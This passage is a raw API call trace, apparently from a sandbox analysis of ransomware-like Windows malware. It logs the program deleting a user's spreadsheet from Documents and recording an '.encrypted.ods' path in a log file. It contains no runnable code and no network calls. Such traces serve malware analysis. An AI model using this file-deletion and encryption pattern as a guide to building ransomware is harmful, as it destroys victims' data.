hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0034.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0034.007] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.007] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0034.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0034.007] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88c778 [0034.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88c778, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0034.008] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.008] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0034.008] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0034.008] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0034.008] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0034.008] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0034.008] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.008] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.009] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0034.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbb0 [0034.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cbb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0034.009] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.009] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.009] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0034.009] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.009] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods", lpFilePart=0x0) returned 0x72 [0034.009] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca45520, ftCreationTime.dwHighDateTime=0x1d5c4c9, ftLastAccessTime.dwLowDateTime=0x39aa5d90, ftLastAccessTime.dwHighDateTime=0x1d5c27b, ftLastWriteTime.dwLowDateTime=0x14277420, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x127d4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="bGB2.ods", cAlternateFileName="")) returned 0x7c2100 [0034.010] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\gtxvbfxnesrqjbx46\\bgb2.ods")) returned 1 [0034.011] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca45520, ftCreationTime.dwHighDateTime=0x1d5c4c9, ftLastAccessTime.dwLowDateTime=0x39aa5d90, ftLastAccessTime.dwHighDateTime=0x1d5c27b, ftLastWriteTime.dwLowDateTime=0x14277420, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x127d4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="bGB2.ods", cAlternateFileName="")) returned 0 [0034.011] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.012] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.012] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.012] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0034.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.012] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.012] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.012] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0034.013] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.013] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.013] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.013] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0034.013] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.013] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.013] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0034.013] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1329, lpOverlapped=0x0) returned 1 [0034.013] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0034.013] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x1329, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.013] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0034.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0034.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.encrypted.ods\r\n", cchWideChar=127, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 127 [0034.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7f) returned 0x7d5c40 [0034.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.encrypted.ods\r\n", cchWideChar=127, lpMultiByteStr=0x7d5c40, cbMultiByte=127, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.encrypted.ods\r\n", lpUsedDefaultChar=0x0) returned 127 [0034.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0034.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0034.014] WriteFile (in: hFile=0x140, lpBuffer=0x7d5b30*, nNumberOfBytesToWrite=0x7e, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5b30*, lpNumberOfBytesWritten=0x6aee3c*=0x7e, lpOverlapped=0x0) returned 1 [0034.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0034.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.014] CloseHandle (hObject=0x140) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0034.015] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0034.015] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0034.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0034.016] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0034.016] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.016] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0034.017] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0034.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 